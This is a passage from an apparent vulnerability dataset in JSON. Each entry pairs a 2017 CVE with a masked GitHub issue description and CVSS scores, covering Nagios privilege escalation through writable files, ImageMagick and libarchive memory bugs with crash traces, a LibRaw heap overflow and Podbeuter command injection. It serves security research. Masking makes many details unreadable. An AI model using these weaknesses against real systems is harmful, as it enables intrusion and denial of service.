  8866. "exploitabilityScore": 3.9
  8867. },
  8868. {
  8869. "CVE_ID": "CVE-2017-14312",
  8870. "Issue_Url_old": "https://github.com/NagiosEnterprises/nagioscore/issues/424",
  8871. "Issue_Url_new": "https://github.com/nagiosenterprises/nagioscore/issues/424",
  8872. "Repo_new": "nagiosenterprises/nagioscore",
  8873. "Issue_Created_At": "2017-08-30T12:27:48Z",
  8874. "description": "Root privilege escalation via insecure executable/config permissions. This is still a work in progress; our Nagios installation is pretty simple so I'll have to do some testing to make sure none of my proposed solutions break things. Problem When Nagios is configured, the user and group under which it will run are chosen: CODETAG Both default to \"nagios\" the following is from APITAG : CODETAG Immediately after those two lines, this appears: APITAG Those APITAG are then used in every invocation of the install command during installation. This can lead to a root exploit in at least two ways. The fundamental problem is that the nagios daemon is intended to be launched as root, but the daemon itself and some critical configuration files are writable (in an exploitable way) by the restricted nagios user NUMBERTAG The binary for the daemon itself, i.e. APITAG is owned by the APITAG , but will be run as root. The APITAG can overwrite that binary with whatever he wants, and root will run it NUMBERTAG The configuration file APITAG specifies the user and group that nagios will run as, but is owned by that same APITAG . He can edit APITAG himself, and set APITAG , APITAG . The command definition file APITAG is also owned by APITAG , and he can place whatever commands in there he likes. Considering that the daemon will run as root the next time it is launched, this will also let the APITAG gain root eventually. Resolution At the very least, APITAG and the executables must not be writable by anyone other than root. To ensure that the executables aren't owned by the nagios user, it suffices to set APITAG in APITAG and APITAG . For the configuration file, I'm not so sure: is there a reason for the other configs (besides APITAG ) to be owned by the APITAG and APITAG ?",
  8875. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  8876. "severity": "HIGH",
  8877. "baseScore": 7.8,
  8878. "impactScore": 5.9,
  8879. "exploitabilityScore": 1.8
  8880. },
  8881. {
  8882. "CVE_ID": "CVE-2017-14324",
  8883. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/739",
  8884. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/739",
  8885. "Repo_new": "imagemagick/imagemagick",
  8886. "Issue_Created_At": "2017-09-08T09:44:06Z",
  8887. "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : URLTAG trigger command : ./magick convert im_poc NUMBERTAG dev/null detail : APITAG APITAG PATHTAG ./magick convert im_poc NUMBERTAG dev/null convert: improper image header ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG effb NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG effb6b3b NUMBERTAG in APITAG APITAG NUMBERTAG effb6b3b NUMBERTAG a in APITAG APITAG NUMBERTAG effb6c6d0ce in APITAG APITAG NUMBERTAG effb6d NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG ce6b0 in APITAG APITAG NUMBERTAG effb NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG effb NUMBERTAG dacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG effb NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
  8888. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8889. "severity": "MEDIUM",
  8890. "baseScore": 6.5,
  8891. "impactScore": 3.6,
  8892. "exploitabilityScore": 2.8
  8893. },
  8894. {
  8895. "CVE_ID": "CVE-2017-14325",
  8896. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/741",
  8897. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/741",
  8898. "Repo_new": "imagemagick/imagemagick",
  8899. "Issue_Created_At": "2017-09-08T09:44:18Z",
  8900. "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert APITAG output.mpc ./magick convert output.mpc output.art detail : APITAG APITAG PATHTAG ./magick convert APITAG output.mpc PATHTAG ./magick convert output.mpc output.art APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG faa NUMBERTAG f NUMBERTAG in posix_memalign ( PATHTAG NUMBERTAG faa NUMBERTAG c NUMBERTAG d in APITAG APITAG NUMBERTAG faa NUMBERTAG a3edcc in APITAG APITAG NUMBERTAG faa NUMBERTAG a3ea NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG bdbc NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG e7c NUMBERTAG f in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG b0 in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG acd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG faa NUMBERTAG aae NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG faa NUMBERTAG e NUMBERTAG in malloc ( PATHTAG NUMBERTAG faa NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG faa NUMBERTAG a3eebd in APITAG APITAG NUMBERTAG faa NUMBERTAG a3ea NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG bdbc NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG e7c NUMBERTAG f in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG b0 in APITAG APITAG NUMBERTAG faa NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG in APITAG APITAG NUMBERTAG faa NUMBERTAG acd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG faa NUMBERTAG aae NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). 
APITAG APITAG",
  8901. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8902. "severity": "MEDIUM",
  8903. "baseScore": 6.5,
  8904. "impactScore": 3.6,
  8905. "exploitabilityScore": 2.8
  8906. },
  8907. {
  8908. "CVE_ID": "CVE-2017-14326",
  8909. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/740",
  8910. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/740",
  8911. "Repo_new": "imagemagick/imagemagick",
  8912. "Issue_Created_At": "2017-09-08T09:44:12Z",
  8913. "description": "memory leak in APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert im_poc NUMBERTAG mat /dev/null detail : APITAG APITAG PATHTAG ./magick im_poc NUMBERTAG mat /dev/null lt magick: multi dimensional matrices are not supported APITAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG cb9a in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e4 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a 
NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fdb NUMBERTAG in posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG b1 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c9 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG fb in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG 
) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e6 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in 
NUMBERTAG allocation(s). APITAG APITAG",
  8914. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8915. "severity": "MEDIUM",
  8916. "baseScore": 6.5,
  8917. "impactScore": 3.6,
  8918. "exploitabilityScore": 2.8
  8919. },
  8920. {
  8921. "CVE_ID": "CVE-2017-14341",
  8922. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/654",
  8923. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/654",
  8924. "Repo_new": "imagemagick/imagemagick",
  8925. "Issue_Created_At": "2017-08-06T13:51:09Z",
  8926. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
  8927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8928. "severity": "MEDIUM",
  8929. "baseScore": 6.5,
  8930. "impactScore": 3.6,
  8931. "exploitabilityScore": 2.8
  8932. },
  8933. {
  8934. "CVE_ID": "CVE-2017-14342",
  8935. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/650",
  8936. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/650",
  8937. "Repo_new": "imagemagick/imagemagick",
  8938. "Issue_Created_At": "2017-08-05T17:16:36Z",
  8939. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory exhaustion vulnerability was found in function APITAG which allows attackers to cause a denial of service via a crafted file. ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
  8940. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8941. "severity": "MEDIUM",
  8942. "baseScore": 6.5,
  8943. "impactScore": 3.6,
  8944. "exploitabilityScore": 2.8
  8945. },
  8946. {
  8947. "CVE_ID": "CVE-2017-14343",
  8948. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/649",
  8949. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/649",
  8950. "Repo_new": "imagemagick/imagemagick",
  8951. "Issue_Created_At": "2017-08-05T15:09:44Z",
  8952. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service via a crafted file. ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
  8953. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8954. "severity": "MEDIUM",
  8955. "baseScore": 6.5,
  8956. "impactScore": 3.6,
  8957. "exploitabilityScore": 2.8
  8958. },
  8959. {
  8960. "CVE_ID": "CVE-2017-14348",
  8961. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/100",
  8962. "Issue_Url_new": "https://github.com/libraw/libraw/issues/100",
  8963. "Repo_new": "libraw/libraw",
  8964. "Issue_Created_At": "2017-09-12T06:43:06Z",
  8965. "description": "Heap buffer overflow in APITAG Sample: CVETAG Credit: Henri Salo from Nixu Corporation Tools: afl NUMBERTAG b, afl utils, GCC APITAG ~~~ ./raw identify APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ee NUMBERTAG at pc NUMBERTAG febd8ff NUMBERTAG d bp NUMBERTAG ffc NUMBERTAG c NUMBERTAG e NUMBERTAG sp NUMBERTAG ffc NUMBERTAG c NUMBERTAG e NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ee NUMBERTAG thread T NUMBERTAG febd8ff NUMBERTAG c in APITAG int, unsigned char , unsigned int) APITAG NUMBERTAG febd NUMBERTAG da9 in APITAG int) APITAG NUMBERTAG febd NUMBERTAG de NUMBERTAG in APITAG APITAG NUMBERTAG febd NUMBERTAG f3fd in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG d7ea in APITAG APITAG NUMBERTAG febd NUMBERTAG b0cc in APITAG APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG c6 in APITAG ) APITAG NUMBERTAG febd NUMBERTAG be1b2 in APITAG const , long long) APITAG NUMBERTAG a9 in main samples/raw APITAG NUMBERTAG febd NUMBERTAG db NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG ee NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG febd NUMBERTAG cb NUMBERTAG f in malloc ( PATHTAG NUMBERTAG febd NUMBERTAG b NUMBERTAG b in APITAG long) APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG b in APITAG long) APITAG NUMBERTAG febd NUMBERTAG d5e in APITAG int) APITAG NUMBERTAG febd NUMBERTAG de NUMBERTAG in APITAG APITAG NUMBERTAG febd NUMBERTAG f3fd in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG 
APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG d7ea in APITAG APITAG NUMBERTAG febd NUMBERTAG b0cc in APITAG APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG c6 in APITAG ) APITAG NUMBERTAG febd NUMBERTAG be1b2 in APITAG const , long long) APITAG NUMBERTAG a9 in main samples/raw APITAG NUMBERTAG febd NUMBERTAG db NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG int, unsigned char , unsigned int) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fd fd NUMBERTAG c NUMBERTAG fff9dd0: fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial 
redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING ~~~",
  8966. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8967. "severity": "HIGH",
  8968. "baseScore": 8.8,
  8969. "impactScore": 5.9,
  8970. "exploitabilityScore": 2.8
  8971. },
  8972. {
  8973. "CVE_ID": "CVE-2017-14400",
  8974. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/746",
  8975. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/746",
  8976. "Repo_new": "imagemagick/imagemagick",
  8977. "Issue_Created_At": "2017-09-11T09:38:24Z",
  8978. "description": "Null Pointer Dereference in APITAG APITAG poc1 version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : URLTAG trigger command : ./magick convert im_poc NUMBERTAG output.mpc ./magick convert output.mpc output.uil detail : APITAG APITAG PATHTAG ./magick im_poc NUMBERTAG out.mpc PATHTAG ./magick out.mpc out.aai ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG edb NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG e0 sp NUMBERTAG ffd NUMBERTAG T NUMBERTAG f NUMBERTAG edb NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG fe in APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG d8 in APITAG APITAG NUMBERTAG f NUMBERTAG e0d5f in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e1f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG e1 in APITAG APITAG NUMBERTAG c2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV APITAG APITAG NUMBERTAG ABORTING APITAG APITAG APITAG Security Lab",
  8979. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8980. "severity": "MEDIUM",
  8981. "baseScore": 6.5,
  8982. "impactScore": 3.6,
  8983. "exploitabilityScore": 2.8
  8984. },
  8985. {
  8986. "CVE_ID": "CVE-2017-14500",
  8987. "Issue_Url_old": "https://github.com/akrennmair/newsbeuter/issues/598",
  8988. "Issue_Url_new": "https://github.com/akrennmair/newsbeuter/issues/598",
  8989. "Repo_new": "akrennmair/newsbeuter",
  8990. "Issue_Created_At": "2017-09-16T18:03:42Z",
  8991. "description": "Remote code execution in Podbeuter. Dear users, On the heels of the previous vulnerability we have a similar one in Podbeuter. An attacker can craft an RSS item where the name of the media enclosure (the podcast file) contains shell code. When the user plays the file in Podbeuter, the shell code will be executed. If you're using Podbeuter only to download podcasts, not play them, you're safe. Podbeuter versions NUMBERTAG through NUMBERTAG are affected. I'm still waiting for CVE. APITAG a request to MITRE on August NUMBERTAG th, pinged them on September NUMBERTAG th, but got nothing back.) Workaround ========== Don't play any podcasts in Podbeuter until you apply the fix. Resolution ========== A fix has already been pushed to our Git repository: URLTAG A patch for NUMBERTAG is also available: URLTAG I'll notify oss EMAILTAG APITAG so distributions ought to pick this up soon enough.",
  8992. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8993. "severity": "HIGH",
  8994. "baseScore": 8.8,
  8995. "impactScore": 5.9,
  8996. "exploitabilityScore": 2.8
  8997. },
  8998. {
  8999. "CVE_ID": "CVE-2017-14501",
  9000. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/949",
  9001. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/949",
  9002. "Repo_new": "libarchive/libarchive",
  9003. "Issue_Created_At": "2017-09-16T19:13:48Z",
  9004. "description": "out of bounds read in APITAG Hi The following was reported downstream in Debian in CVETAG The reproducer (compressed with gzip), base NUMBERTAG APITAG is CODETAG ERRORTAG",
  9005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9006. "severity": "MEDIUM",
  9007. "baseScore": 6.5,
  9008. "impactScore": 3.6,
  9009. "exploitabilityScore": 2.8
  9010. },
  9011. {
  9012. "CVE_ID": "CVE-2017-14503",
  9013. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/948",
  9014. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/948",
  9015. "Repo_new": "libarchive/libarchive",
  9016. "Issue_Created_At": "2017-09-16T18:50:05Z",
  9017. "description": "out of bounds read in APITAG Hi The following was reported downstream in Debian at CVETAG The APITAG base NUMBERTAG encoded is: APITAG ` tested against APITAG ERRORTAG",
  9018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9019. "severity": "MEDIUM",
  9020. "baseScore": 6.5,
  9021. "impactScore": 3.6,
  9022. "exploitabilityScore": 2.8
  9023. },
  9024. {
  9025. "CVE_ID": "CVE-2017-14505",
  9026. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/716",
  9027. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/716",
  9028. "Repo_new": "imagemagick/imagemagick",
  9029. "Issue_Created_At": "2017-08-31T17:47:48Z",
  9030. "description": "Null Pointer Dereference triggered by malformed Image File. A Null Pointer Dereference issue is present in the APITAG function in the file PATHTAG This is due to the following vulnerable code: CODETAG The variable _dasharray_ gets the output of APITAG Looking at the code within this function, the following code explicitly returns NULL : APITAG Eventually _q_ gets the value stored in _dasharray_ (which is potentially NULL ) in APITAG Finally, _q_ gets explicitly dereferenced in APITAG Using APITAG would resolve the Null Pointer Dereference vulnerability.",
  9031. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9032. "severity": "MEDIUM",
  9033. "baseScore": 6.5,
  9034. "impactScore": 3.6,
  9035. "exploitabilityScore": 2.8
  9036. },
  9037. {
  9038. "CVE_ID": "CVE-2017-14530",
  9039. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/9",
  9040. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/9",
  9041. "Repo_new": "cybersecurityworks/disclosed",
  9042. "Issue_Created_At": "2015-10-27T09:34:16Z",
